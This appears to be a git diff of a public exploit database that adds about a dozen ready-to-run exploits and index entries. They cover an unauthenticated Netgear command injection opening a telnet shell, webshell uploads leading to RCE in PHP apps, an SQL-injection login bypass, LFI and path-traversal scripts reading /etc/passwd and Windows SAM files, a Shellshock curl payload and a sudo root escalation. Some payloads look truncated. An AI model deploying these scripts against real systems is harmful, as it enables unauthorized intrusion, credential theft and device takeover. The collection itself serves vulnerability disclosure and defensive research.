diff --git a/exploits/hardware/webapps/50059.txt b/exploits/hardware/webapps/50059.txt deleted file mode 100644 index 7bf8bb178..000000000 --- a/exploits/hardware/webapps/50059.txt +++ /dev/null @@ -1,45 +0,0 @@ -# Title: Huawei dg8045 - Authentication Bypass -# Date: 2020-06-24 -# Author: Abdalrahman Gamal -# Vendor Homepage: www.huawei.com -# Version: dg8045 -# Hardware Version: VER.A - -#POC: - -The default password of this router is the last 8 characters of the -device's serial number which exist in the back of the device. - -An attacker can leak the serial number via the web app API like the -following: - -************************Request************************ -GET /api/system/deviceinfo HTTP/1.1 -Host: 192.168.1.1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) -Gecko/20100101 Firefox/65.0 -Accept: application/json, text/javascript, */*; q=0.01 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: https://192.168.1.1/ -X-Requested-With: XMLHttpRequest -Connection: close - - -************************Response************************ -HTTP/1.1 200 OK -Cache-Control: no-cache, no-store, max-age=0, must-revalidate -X-Download-Options: noopen -X-Frame-Options: SAMEORIGIN -X-XSS-Protection: 1; mode=block -Date: Thu, 24 Jun 2021 02:07 GMT+2 -Connection: Keep-Alive -Content-Language: en -Content-Type: application/javascript -Content-Length: 141 - -while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/ - - - -You can use that serial number last 8 char/digits to login to the router. \ No newline at end of file diff --git a/exploits/hardware/webapps/50099.py b/exploits/hardware/webapps/50099.py new file mode 100755 index 000000000..c90464472 --- /dev/null +++ b/exploits/hardware/webapps/50099.py @@ -0,0 +1,72 @@ +# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) +# Date: 02.07.2021 +# Exploit Author: SivertPL +# Vendor Homepage: https://www.netgear.com/ +# Version: All prior to v1.0.0.60 + +#!/usr/bin/python + +""" +NETGEAR DGN2200v1 Unauthenticated Remote Command Execution + +Author: SivertPL (kroppoloe@protonmail.ch) +Date: 02.07.2021 +Status: Patched in some models +Version: All prior to v1.0.0.60 +Impact: Critical + +CVE: No CVE number assigned +PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365 + + +References: + 1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ + 2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 + + +The exploit script only works on UNIX-based systems. + +This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past. +This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol. + +""" + +import sys +import requests +import os + +target_ip = "192.168.0.1" +telnet_port = 666 +sent = False + +def main(): + if len(sys.argv) < 3: + print "./dgn2200_pwn.py " + exit() + + target_ip = sys.argv[1] + telnet_port = int(sys.argv[2]) + print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..." + send_payload() + print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..." + print "[!] If it fails to connect it means the target is probably not vulnerable" + spawn_shell() + +def send_payload(): + try: + requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true") + sent = True + except Exception: + sent = False + print "[-] Unknown error, target might not be vulnerable." + +def spawn_shell(): + if sent: + print "[+] Dropping a shell..." + os.system("telnet " + target_ip + " " + telnet_port) + else: + exit() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/50100.py b/exploits/hardware/webapps/50100.py new file mode 100755 index 000000000..6bd145eed --- /dev/null +++ b/exploits/hardware/webapps/50100.py @@ -0,0 +1,23 @@ +# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion +# Date: 05.07.2021 +# Exploit Author: Ferhat Çil +# Vendor Homepage: http://www.blackbox.com/ +# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm +# Version: 3.4.31307 +# Category: Webapps +# Tested on: Linux +# Description: Any user can read files from the server +# without authentication due to an existing LFI in the following path: +# http://target//cgi-bin/show?page=FilePath + +import requests +import sys + +if name == 'main': + if len(sys.argv) == 3: + url = sys.argv[1] + payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2] + r = requests.get(payload) + print(r.text) + else: + print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd') \ No newline at end of file diff --git a/exploits/hardware/webapps/50104.txt b/exploits/hardware/webapps/50104.txt new file mode 100644 index 000000000..ca91046dc --- /dev/null +++ b/exploits/hardware/webapps/50104.txt @@ -0,0 +1,11 @@ +# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation +# Date: 2021-07-05 +# Exploit Author: Andrea D'Ubaldo +# Vendor Homepage: https://visual-tools.com/ +# Version: Visual Tools VX16 v4.2.28.0 +# Tested on: VX16 Embedded Linux 2.6.35.4. + +#An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration. + +sudo mount -o bind /bin/sh /bin/mount +sudo mount \ No newline at end of file diff --git a/exploits/multiple/webapps/50097.txt b/exploits/multiple/webapps/50097.txt new file mode 100644 index 000000000..ce734c746 --- /dev/null +++ b/exploits/multiple/webapps/50097.txt @@ -0,0 +1,140 @@ +# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS) +# Date: 05/07/2021 +# Exploit Author: Alhasan Abbas (exploit.msf) +# Vendor Homepage: https://www.perfexcrm.com/ +# Version: 1.10 +# Tested on: windows 10 + +Vunlerable page: /clients/profile + +POC: +---- +POST /clients/profile HTTP/1.1 + +Host: localhost + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058 + +Content-Length: 1548 + +Origin: http://localhost + +Connection: close + +Referer: http://localhost/clients/profile + +Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038 + +Upgrade-Insecure-Requests: 1 + + + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="profile" + + + +1 + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="profile_image"; filename="" + +Content-Type: application/octet-stream + + + + + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="firstname" + + + +adfgsg + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="lastname" + + + +fsdgfdg + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="company" + + + +test + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="vat" + + + +1 + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="phonenumber" + + + + + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="country" + + + +105 + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="city" + + + +asdf + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="address" + + + +asdf + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="zip" + + + +313 + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="state" + + + +"">"> + +-----------------------------325278703021926100783634528058-- + +then any one open profile page in user the xss its executed \ No newline at end of file diff --git a/exploits/multiple/webapps/50098.txt b/exploits/multiple/webapps/50098.txt new file mode 100644 index 000000000..99a79a3c2 --- /dev/null +++ b/exploits/multiple/webapps/50098.txt @@ -0,0 +1,10 @@ +# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) +# Date: 2021-07-05 +# Exploit Author: Andrea D'Ubaldo +# Vendor Homepage: https://visual-tools.com/ +# Version: Visual Tools VX16 v4.2.28.0 +# Tested on: VX16 Embedded Linux 2.6.35.4. + +# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution. + +curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py \ No newline at end of file diff --git a/exploits/php/webapps/50102.py b/exploits/php/webapps/50102.py new file mode 100755 index 000000000..d4dd053f7 --- /dev/null +++ b/exploits/php/webapps/50102.py @@ -0,0 +1,68 @@ +# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 06.07.2021 +# Exploit Author: Talha DEMİRSOY +# Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html +# Version: V 1.0 +# Tested on: Linux & Windows + +import requests +import random +import string +from bs4 import BeautifulSoup + +let = string.ascii_lowercase +shellname = ''.join(random.choice(let) for i in range(15)) +randstr = ''.join(random.choice(let) for i in range(15)) + +payload= "'; $cmd = +($_GET['cmd']); system($cmd); echo ''; die; } ?>" + +url = input("Target : ") + +session = requests.session() + +reqUrl = url + "login.php" +reqHead = {"Content-Type": "application/x-www-form-urlencoded"} +reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''} +session.post(reqUrl, headers=reqHead, data=reqData) + +print("Shell Uploading...") + +reqUrl = url + "php_action/createProduct.php" +reqHead = {"Content-Type": "multipart/form-data; +boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"} +reqData = +"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"currnt_date\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; name=\"productImage\"; +filename=\""+shellname+".php\"\r\nContent-Type: +application/octet-stream\r\n\r\n"+payload+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"productName\"\r\n\r\n"+randstr+"_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"quantity\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"rate\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"brandName\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"categoryName\"\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"productStatus\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"create\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n" +session.post(reqUrl, headers=reqHead, data=reqData) + +print("product name is "+randstr) +print("shell name is "+shellname) + +reqUrl = url + "product.php" +data = session.get(reqUrl) + +parser = BeautifulSoup(data.text, 'html.parser') +find_shell = parser.find_all('img') + +for i in find_shell: + if shellname in i.get("src"): + print("Shell URL : " + url + i.get("src") + "?cmd=whoami") \ No newline at end of file diff --git a/exploits/php/webapps/50103.php b/exploits/php/webapps/50103.php new file mode 100644 index 000000000..dc485661b --- /dev/null +++ b/exploits/php/webapps/50103.php @@ -0,0 +1,119 @@ +# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) +# Date: 06/07/2021 +# Exploit Author: Thamer Almohammadi (@Thamerz88) +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html +# Version: 1.0 +# Tested on: Kali Linux + +# Proof of Concept : + +1- Send Request to /pages/save_user.php. +2- Find your shell.php file path and try any command. + + +################################## REQUEST ############################### +POST /pages/save_user.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877 +Content-Length: 369 +-----------------------------3767690350396265302394702877 +Content-Disposition: form-data; name="image"; filename="shell.php" +Content-Type: application/x-php + +-----------------------------3767690350396265302394702877 + +Content-Disposition: form-data; name="btn_save" + +-----------------------------3767690350396265302394702877-- + + + + +################################## RESPONSE ############################# +HTTP/1.1 200 OK +Date: Tue, 06 Jul 2021 02:16:18 GMT +Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1 +X-Powered-By: PHP/7.3.28 +Content-Length: 1529 +Connection: close +Content-Type: text/html; charset=UTF-8 + + + +################################## Exploit ############################# +File To Upload : ";}else{echo "Upload failed";}?>'; + $data = "-----------------------------3767690350396265302394702877\r\n"; + $data .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n"; + $data .= "Content-Type: image/gif\r\n\r\n"; + $data .= "$content\r\n"; + $data .= "-----------------------------3767690350396265302394702877\r\n"; + + $data .= "-----------------------------3767690350396265302394702877\r\n"; + $data .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n"; + $data .= "\r\n"; + $data .= "-----------------------------3767690350396265302394702877\r\n"; + + $packet = "POST $path/pages/save_user.php HTTP/1.0\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n"; + $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n"; + $packet .= "Accept-Language: en-us,en;q=0.5\r\n"; + $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; + $packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n"; + $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n"; + $packet .= $data; + $packet .= "\r\n"; + send($host, $packet); + sleep(2); + check($url,$shell); +} +function send($host, $packet) +{ + if ($connect = @fsockopen ($host, 80, $x, $y, 3)) + { + @fputs ($connect, $packet); + @fclose ($connect); + } + +} + +function check($url,$shell){ + $check=file_get_contents($url."/uploadImage/Profile/".$shell); + $preg=preg_match('/(File To Upload)/', $check, $output); + if($output[0] == "File To Upload"){ + echo "[+] Upload shell successfully.. :D\n"; + echo "[+] Link ". $url."/uploadImage/Profile/".$shell."\n"; + } + else{ //Exploit Failed + echo "[-] Exploit Failed..\n"; + } + + +} +$options=getopt("u:s:"); +if(!isset($options['u'], $options['s'])) +die("\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n +-u http://target.com = Target URL .. +-s shell.php = Shell Name ..\n\n"); +$url=$options["u"]; +$shell=$options["s"]; +$parse=parse_url($url); +$host=$parse['host']; +$path=$parse['path']; +$scheme=$parse['scheme']; +exploit($scheme,$host,$path,$shell); + +?> \ No newline at end of file diff --git a/exploits/php/webapps/50105.txt b/exploits/php/webapps/50105.txt new file mode 100644 index 000000000..2616c673d --- /dev/null +++ b/exploits/php/webapps/50105.txt @@ -0,0 +1,38 @@ +# Exploit Title: Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi) +# Date: 2021-07-06 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html +# Version: 1.0 +# Tested on: Windows 10, XAMPP + + +########### +# PoC # +########### + +Request: +======== + +POST /osms/Execute/ExLogin.php HTTP/1.1 +Host: localhost +Content-Length: 43 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://localhost/osms/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +Username=or+1%3D1%2F*&Password=or+1%3D1%2F* + + +Payload: +========= + +Username=or 1=1/* +Password=or 1=1/* \ No newline at end of file diff --git a/exploits/php/webapps/50106.txt b/exploits/php/webapps/50106.txt new file mode 100644 index 000000000..fa1e1266a --- /dev/null +++ b/exploits/php/webapps/50106.txt @@ -0,0 +1,161 @@ +# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution +# Date: 2021-07-06 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html +# Version: 1.0 +# Tested on: Windows 10, XAMPP + + +########### +# PoC 1: # +########### + +Request: +======== + +POST /osms/Execute/ExAddProduct.php HTTP/1.1 +Host: localhost +Content-Length: 2160 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://localhost/osms/AddNewProduct.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0 +Connection: close + +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="ProductName" + +camera +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="BrandName" + +soskod +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="ProductPrice" + +12 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Quantity" + +1 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="TotalPrice" + +12 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="DisplaySize" + +15 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="OperatingSystem" + +windows +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Processor" + +4 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="InternalMemory" + +4 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="RAM" + +4 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="CameraDescription" + +lens +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="BatteryLife" + +3300 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Weight" + +500 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Model" + +AIG34 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Dimension" + +5 inch +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="ASIN" + +9867638 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="ProductImage"; filename="rev.php" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="date2" + +2020-06-03 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Description" + +accept +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="_wysihtml5_mode" + +1 +------WebKitFormBoundaryIBZWMUliFtu0otJ0-- + + + +########### +# PoC 2: # +########### + +Request: +======== + +POST /osms/Execute/ExChangePicture.php HTTP/1.1 +Host: localhost +Content-Length: 463 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://localhost/osms/UserProfile.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594 +Connection: close + +------WebKitFormBoundary4Dm8cGBqGNansHqI +Content-Disposition: form-data; name="IDUser" + +6 +------WebKitFormBoundary4Dm8cGBqGNansHqI +Content-Disposition: form-data; name="Image"; filename="rev.php" +Content-Type: application/octet-stream + + +------WebKitFormBoundary4Dm8cGBqGNansHqI-- + + + +########### +# Access: # +########### + +# Webshell access via: +PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami +PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami + +# Output: +result: windows10\user \ No newline at end of file diff --git a/exploits/php/webapps/50107.py b/exploits/php/webapps/50107.py new file mode 100755 index 000000000..d285f0602 --- /dev/null +++ b/exploits/php/webapps/50107.py @@ -0,0 +1,11 @@ +# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal +# Date: 05.07.2021 +# Exploit Author: TheSmuggler +# Vendor Homepage: https://gotmls.net/ +# Software Link: https://gotmls.net/downloads/ +# Version: <= 4.20.72 +# Tested on: Windows + +import requests + +print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text) \ No newline at end of file diff --git a/exploits/python/webapps/50101.py b/exploits/python/webapps/50101.py new file mode 100755 index 000000000..15c188104 --- /dev/null +++ b/exploits/python/webapps/50101.py @@ -0,0 +1,128 @@ +# Exploit Title: Pallets Werkzeug 0.15.4 - Path Traversal +# Date: 06 July 2021 +# Original Author: Emre ÖVÜNÇ +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://palletsprojects.com/ +# Software Link: https://github.com/pallets/werkzeug +# Version: Prior to 0.15.5 +# Tested on: Windows Server +# CVE: 2019-14322 +# Credit: Emre Övünç and Olivier Dony for responsibly reporting the issue +# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-14322 +# Reference : https://palletsprojects.com/blog/werkzeug-0-15-5-released/ + +Description : Prior to 0.15.5, it was possible for a third party to potentially access arbitrary files when the application used SharedDataMiddleware on Windows. Due to the way Python's os.path.join() function works on Windows, a path segment with a drive name will change the drive of the final path. TLDR; In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames lead to arbitrary file download. + +#!/usr/bin/env python3 +# PoC code by @faisalfs10x [https://github.com/faisalfs10x] + +""" $ pip3 install colorama==0.3.3, argparse, requests, urllib3 + $ python3 CVE-2019-14322.py -l list_target.txt" +""" +import argparse +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +import requests +from colorama import Fore, Back, Style, init + +# Colors +red = '\033[91m' +green = '\033[92m' +white = '\033[97m' +yellow = '\033[93m' +bold = '\033[1m' +end = '\033[0m' + +init(autoreset=True) + +def banner_motd(): + print(Fore.CYAN +Style.BRIGHT +""" + + CVE-2019-14322 %sPoC by faisalfs10x%s - (%s-%s)%s %s +""" % (bold, red, white, yellow, white, end)) + +banner_motd() + +# list of sensitive files to grab in windows + +# %windir%\repair\sam +# %windir%\System32\config\RegBack\SAM +# %windir%\repair\system +# %windir%\repair\software +# %windir%\repair\security +# %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account) +# %windir%\iis6.log (5,6 or 7) +# %windir%\system32\logfiles\httperr\httperr1.log +# C:\sysprep.inf +# C:\sysprep\sysprep.inf +# C:\sysprep\sysprep.xml +# %windir%\Panther\Unattended.xml +# C:\inetpub\wwwroot\Web.config +# %windir%\system32\config\AppEvent.Evt (Application log) +# %windir%\system32\config\SecEvent.Evt (Security log) +# %windir%\system32\config\default.sav +# %windir%\system32\config\security.sav +# %windir%\system32\config\software.sav +# %windir%\system32\config\system.sav +# %windir%\system32\inetsrv\config\applicationHost.config +# %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml +# %windir%\System32\drivers\etc\hosts (dns entries) +# %windir%\System32\drivers\etc\networks (network settings) +# %windir%\system32\config\SAM +# TLDR: +# C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml +# C:/windows/system32/inetsrv/config/applicationHost.config +# C:/windows/system32/logfiles/httperr/httperr1.log +# C:/windows/debug/NetSetup.log - (may contain AD domain name, DC name, internal IP, DA account) +# C:/windows/system32/drivers/etc/hosts - (dns entries) +# C:/windows/system32/drivers/etc/networks - (network settings) + +def check(url): + + # There are 3 endpoints to be tested by default, but to avoid noisy, just pick one :) + for endpoint in [ + 'https://{}/base_import/static/c:/windows/win.ini', + #'https://{}/web/static/c:/windows/win.ini', + #'https://{}/base/static/c:/windows/win.ini' + ]: + try: + + url2 = endpoint.format(url) + resp = requests.get(url2, verify=False, timeout=5) + + if 'fonts' and 'files' and 'extensions' in resp.text: + print(Fore.LIGHTGREEN_EX +Style.BRIGHT +" [+] " +url2+ " : vulnerable====[+]") + with open('CVE-2019-14322_result.txt', 'a+') as output: + output.write('{}\n'.format(url2)) + output.close() + + else: + print(" [-] " +url+ " : not vulnerable") + + except KeyboardInterrupt: + exit('User aborted!') + except: + print(" [-] " +url+ " : not vulnerable") + + +def main(args): + + f = open(listfile, "r") + for w in f: + url = w.strip() + + check(url) + +if __name__ == '__main__': + + try: + + parser = argparse.ArgumentParser(description='CVE-2019-14322') + parser.add_argument("-l","--targetlist",required=True, help = "target list in file") + args = parser.parse_args() + listfile = args.targetlist + + main(args) + + except KeyboardInterrupt: + exit('User aborted!') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2ee3f0b55..6c51ad110 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44204,7 +44204,7 @@ id,file,description,date,author,type,platform,port 50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple, 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",2021-06-24,Pergyz,webapps,cfm, 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",2021-06-24,"Koh You Liang",webapps,hardware, -50059,exploits/hardware/webapps/50059.txt,"Huawei dg8045 - Authentication Bypass",2021-06-24,"Abdalrahman Gamal",webapps,hardware, +50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",2021-07-06,TheSmuggler,webapps,php, 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php, 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php, 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php, @@ -44235,3 +44235,13 @@ id,file,description,date,author,type,platform,port 50094,exploits/php/webapps/50094.py,"Simple Client Management System 1.0 - Remote Code Execution (RCE)",2021-07-05,"Ishan Saha",webapps,php, 50095,exploits/php/webapps/50095.py,"TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)",2021-07-05,"Mevlüt Akçam",webapps,php, 50096,exploits/hardware/webapps/50096.py,"Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)",2021-07-05,LiquidWorm,webapps,hardware, +50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple, +50098,exploits/multiple/webapps/50098.txt,"Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)",2021-07-06,"Andrea D\'Ubaldo",webapps,multiple, +50099,exploits/hardware/webapps/50099.py,"Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)",2021-07-06,SivertPL,webapps,hardware, +50100,exploits/hardware/webapps/50100.py,"Black Box Kvm Extender 3.4.31307 - Local File Inclusion",2021-07-06,"Ferhat Çil",webapps,hardware, +50101,exploits/python/webapps/50101.py,"Pallets Werkzeug 0.15.4 - Path Traversal",2021-07-06,faisalfs10x,webapps,python, +50102,exploits/php/webapps/50102.py,"Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-07-06,"Talha DEMİRSOY",webapps,php, +50103,exploits/php/webapps/50103.php,"Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)",2021-07-06,"Thamer Almohammadi",webapps,php, 